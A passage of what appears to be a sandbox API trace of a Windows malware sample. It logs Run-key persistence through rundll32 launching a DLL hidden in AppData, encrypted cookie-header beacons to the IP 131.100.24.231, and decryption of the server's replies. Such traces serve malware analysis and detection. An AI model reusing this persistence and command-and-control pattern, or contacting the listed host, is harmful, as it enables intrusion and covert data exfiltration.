hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0566.959] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0566.959] GetProcessHeap () returned 0x530000 [0566.960] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0566.960] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0566.960] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0566.962] GetProcessHeap () returned 0x530000 [0566.962] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c6c0 [0566.962] GetProcessHeap () returned 0x530000 [0566.962] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0566.962] GetProcessHeap () returned 0x530000 [0566.963] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0566.963] GetProcessHeap () returned 0x530000 [0566.963] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2996d60 | out: hHeap=0x530000) returned 1 [0566.963] GetProcessHeap () returned 0x530000 [0566.964] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0566.964] GetProcessHeap () returned 0x530000 [0566.964] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0566.964] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0566.964] GetProcessHeap () returned 0x530000 [0566.964] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83ce0 [0566.964] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gbYcFjSMKXpvo") returned 103 [0566.964] GetProcessHeap () returned 0x530000 [0566.965] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83ce0 | out: hHeap=0x530000) returned 1 [0566.965] GetProcessHeap () returned 0x530000 [0566.965] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0566.965] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x648, lpdwDisposition=0x0) returned 0x0 [0566.965] GetProcessHeap () returned 0x530000 [0566.965] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0566.965] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gbYcFjSMKXpvo") returned 103 [0566.965] RegSetValueExW (in: hKey=0x648, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gbYcFjSMKXpvo", cbData=0xd0 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",gbYcFjSMKXpvo") returned 0x0 [0566.966] RegCloseKey (hKey=0x648) returned 0x0 [0566.966] GetProcessHeap () returned 0x530000 [0566.966] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c6c0 | out: hHeap=0x530000) returned 1 [0566.966] GetProcessHeap () returned 0x530000 [0566.967] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0566.967] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xdfbe4) returned 0x102 [0577.005] GetProcessHeap () returned 0x530000 [0577.005] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7248 [0577.005] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0577.006] GetProcessHeap () returned 0x530000 [0577.006] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7248 | out: hHeap=0x530000) returned 1 [0577.006] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0577.006] GetProcessHeap () returned 0x530000 [0577.006] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7248 [0577.006] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0577.006] GetProcessHeap () returned 0x530000 [0577.006] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7248 | out: hHeap=0x530000) returned 1 [0577.006] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83be0 [0577.010] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0577.010] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0577.010] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0577.010] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0577.011] FindNextFileW (in: hFindFile=0x2a83be0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0577.011] FindClose (in: hFindFile=0x2a83be0 | out: hFindFile=0x2a83be0) returned 1 [0577.011] GetProcessHeap () returned 0x530000 [0577.011] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0577.011] GetProcessHeap () returned 0x530000 [0577.011] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7248 [0577.012] GetProcessHeap () returned 0x530000 [0577.012] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0577.012] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0577.014] GetProcessHeap () returned 0x530000 [0577.014] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7248 | out: hHeap=0x530000) returned 1 [0577.014] GetProcessHeap () returned 0x530000 [0577.015] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0577.015] GetProcessHeap () returned 0x530000 [0577.015] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63120 [0577.015] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0577.015] GetProcessHeap () returned 0x530000 [0577.015] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63120 | out: hHeap=0x530000) returned 1 [0577.015] GetProcessHeap () returned 0x530000 [0577.015] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0577.015] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0577.015] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0577.015] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0577.015] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0577.016] GetProcessHeap () returned 0x530000 [0577.016] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0577.016] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0577.016] GetProcessHeap () returned 0x530000 [0577.016] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76350 [0577.016] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76350, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0577.016] GetProcessHeap () returned 0x530000 [0577.016] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0577.016] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76350, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0577.017] GetProcessHeap () returned 0x530000 [0577.017] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe4) returned 0x2b5be28 [0577.018] GetProcessHeap () returned 0x530000 [0577.019] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0577.019] GetProcessHeap () returned 0x530000 [0577.019] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0577.019] CryptBinaryToStringW (in: pbBinary=0x2b5be28, cbBinary=0xe4, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0577.019] GetProcessHeap () returned 0x530000 [0577.019] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x262) returned 0x2b65430 [0577.019] CryptBinaryToStringW (in: pbBinary=0x2b5be28, cbBinary=0xe4, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsoKaqzU2/F2I6rZAEo8USE6VJM2C034stTRyQuptcM2EJi02kBDbabFwNoN/FVSqSipZg1nJc83OqvPNcM9RD7K1lti", pcchString=0x2cf504) returned 1 [0577.019] GetProcessHeap () returned 0x530000 [0577.019] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0577.019] GetProcessHeap () returned 0x530000 [0577.019] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f40 [0577.019] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: diHGCOocjwiEqdl=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsoKaqzU2/F2I6rZAEo8USE6VJM2C034stTRyQuptcM2EJi02kBDbabFwNoN/FVSqSipZg1nJc83OqvPNcM9RD7K1lti\r\n") returned 330 [0577.019] GetProcessHeap () returned 0x530000 [0577.020] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f40 | out: hHeap=0x530000) returned 1 [0577.020] GetProcessHeap () returned 0x530000 [0577.020] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0577.020] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0577.021] GetProcessHeap () returned 0x530000 [0577.021] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0577.021] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0577.025] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="snIYiBNxSZRzyhECNZCAQ", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0577.025] GetProcessHeap () returned 0x530000 [0577.025] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0577.026] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0577.026] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0577.026] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0577.026] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: diHGCOocjwiEqdl=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTsoKaqzU2/F2I6rZAEo8USE6VJM2C034stTRyQuptcM2EJi02kBDbabFwNoN/FVSqSipZg1nJc83OqvPNcM9RD7K1lti\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0578.271] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0578.271] GetProcessHeap () returned 0x530000 [0578.271] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0578.272] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x31e) returned 1 [0578.272] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b4811e, dwNumberOfBytesToRead=0xfce2, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b4811e*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0578.272] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0578.272] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0578.272] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0578.272] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0578.272] GetProcessHeap () returned 0x530000 [0578.272] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76350 [0578.272] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76350, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76350, pcbResult=0x2cf51c) returned 0x0 [0578.272] GetProcessHeap () returned 0x530000 [0578.272] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0578.272] GetProcessHeap () returned 0x530000 [0578.272] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0578.272] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0578.273] GetProcessHeap () returned 0x530000 [0578.273] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0578.273] GetProcessHeap () returned 0x530000 [0578.273] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0578.274] GetProcessHeap () returned 0x530000 [0578.274] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62e28 [0578.274] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0578.274] GetProcessHeap () returned 0x530000 [0578.274] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62e28 | out: hHeap=0x530000) returned 1 [0578.274] GetProcessHeap () returned 0x530000 [0578.274] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0578.274] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0578.274] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76398, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0578.274] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0578.274] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0578.274] GetProcessHeap () returned 0x530000 [0578.274] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0578.274] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0578.275] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76354, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0578.277] GetProcessHeap () returned 0x530000 [0578.277] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c650 [0578.278] GetProcessHeap () returned 0x530000 [0578.279] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0578.279] GetProcessHeap () returned 0x530000 [0578.279] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0578.279] GetProcessHeap () returned 0x530000 [0578.280] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b5be28 | out: hHeap=0x530000) returned 1 [0578.280] GetProcessHeap () returned 0x530000 [0578.280] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0578.280] GetProcessHeap () returned 0x530000 [0578.280] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0578.280] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0578.281] GetProcessHeap () returned 0x530000 [0578.281] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83b20 [0578.281] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",AAOlrBCLc") returned 99 [0578.281] GetProcessHeap () returned 0x530000 [0578.281] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83b20 | out: hHeap=0x530000) returned 1 [0578.281] GetProcessHeap () returned 0x530000 [0578.281] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76350 [0578.281] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x658, lpdwDisposition=0x0) returned 0x0 [0578.282] GetProcessHeap () returned 0x530000 [0578.282] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76350 | out: hHeap=0x530000) returned 1 [0578.282] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",AAOlrBCLc") returned 99 [0578.282] RegSetValueExW (in: hKey=0x658, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",AAOlrBCLc", cbData=0xc8 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",AAOlrBCLc") returned 0x0 [0578.283] RegCloseKey (hKey=0x658) returned 0x0 [0578.284] GetProcessHeap () returned 0x530000 [0578.284] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c650 | out: hHeap=0x530000) returned 1 [0578.284] GetProcessHeap () returned 0x530000 [0578.284] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0578.284] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe847e) returned 0x102 [0588.409] GetProcessHeap () returned 0x530000 [0588.409] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0588.409] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0588.409] GetProcessHeap () returned 0x530000 [0588.409] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0588.409] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0588.409] GetProcessHeap () returned 0x530000 [0588.409] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7200 [0588.409] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0588.409] GetProcessHeap () returned 0x530000 [0588.409] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7200 | out: hHeap=0x530000) returned 1 [0588.409] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0588.411] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0588.411] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, 